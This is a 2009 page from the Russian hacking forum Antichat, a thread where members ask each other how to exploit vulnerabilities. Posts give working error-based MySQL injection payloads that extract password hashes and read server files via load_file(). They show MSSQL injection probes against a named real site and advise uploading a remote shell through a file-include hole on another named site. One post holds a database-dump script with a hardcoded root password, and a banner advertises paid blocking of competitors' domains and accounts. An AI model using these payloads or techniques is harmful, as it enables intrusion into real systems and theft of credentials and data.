Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1035 из 1393

1035

Опции темы

Поиск в этой теме

Опции просмотра

#10341

21.11.2009, 18:51

ZET36

Участник форума

Регистрация: 08.10.2007

Сообщений: 259

Провел на форуме:
500748

Репутация: 137

Strilo4ka Спасибо, руками уже пробывал - безрезультатно, буду колдовать со сканером))
Ctacok Незнаю, изображение добавляется как скриншот в письме в саппорт о неполадке сервиса

#10342

21.11.2009, 18:57

InFlame

Участник форума

Регистрация: 27.10.2008

Сообщений: 215

Провел на форуме:
810079

Репутация: 90

Цитата:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a

Возможно ли через этот метод читать и записывать файлы?

#10343

21.11.2009, 18:58

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

Цитата:

Сообщение от YuNi|[c

Это вед ошибка MSSQL?

да

#10344

21.11.2009, 18:58

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

Провел на форуме:
950638

Репутация: 256

Отправить сообщение для DrAssault с помощью ICQ

Цитата:

Сообщение от Strilo4ka

YuNi|[c там robots.txt не закрыт

мило
http://drstockpick.com/robots.txt

А почему он должен быть закрыт, не подскажешь?

#10345

21.11.2009, 19:41

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

Провел на форуме:
791766

Репутация: 61

Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.

Попробовал

PHP код:


		
			
#!/bin/sh



DB=forum

USER=root

PASS=motynub

HOST=localhost



echo "Content-Type: text/plain"

echo "Content-Disposition: attachment; filename=$DB.sql"

echo



mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -u "$USER" -p"$PASS" -h $HOST $DB

Но вышел еррор 500 (safe_mode = ON)

Последний раз редактировалось Byrger; 21.11.2009 в 19:57..

#10346

21.11.2009, 20:19

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью ICQ

Отправить сообщение для RulleR с помощью Yahoo

2 InFlame
чтение файлов возможно, используй load_file(). Естественно для успешного чтения юзер под которым работает бд должен иметь file_priv = Y

Цитата:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(load_file('C:/boot.ini'),1)d) as t JOIN (SELECT NAME_CONST(load_file('C:/boot.ini'),1)e)b)a

вывод режется до 64 символов

остальные символы читаем с помощью функции substr()

Цитата:

SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)d) as t JOIN (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)e)b)a

#10347

22.11.2009, 06:31

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

на

Цитата:

http://investorshub.advfn.com/boards/boards_moderated.asp?user='

Microsoft SQL Native Client error '80040e14'

Unclosed quotation mark after the character string ''.

/boards/boards_moderated.asp, line 19
а на

Цитата:

http://investorshub.advfn.com/boards/boards_moderated.asp?user='+and+1=convert(int,@@ve rsion)--

идеть редирект на главную страницу. Как поступит в данном случае или просто забыть про ресурс?

#10348

22.11.2009, 10:43

Nosfer

Новичок

Регистрация: 10.01.2007

Сообщений: 16

Провел на форуме:
109680

Репутация: 2

Можно ли с этим как-либо шелл залить или тут просто фрейм и вообще лучше забить?

Вот ссылка: http://www.pngbd.com/business/?page=http://forum.antichat.ru

#10349

22.11.2009, 13:35

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

есть ли возможность брутить сами имена таблицы посимвольно на 4 вертке MySQL? А то тока на 5 версии есть такое возможность

#10350

22.11.2009, 14:16

BlackPanther

Новичок

Регистрация: 19.04.2009

Сообщений: 15

Провел на форуме:
139497

Репутация: 10

Цитата:

Сообщение от Nosfer

можно
залей на какой нить свой сайт шелл и подаставь его
типо http://www.pngbd.com/business/?page=http://site/shell.txt

YuNi|[c
по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц

Последний раз редактировалось BlackPanther; 22.11.2009 в 14:19..

Страница 1035 из 1393

1035

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход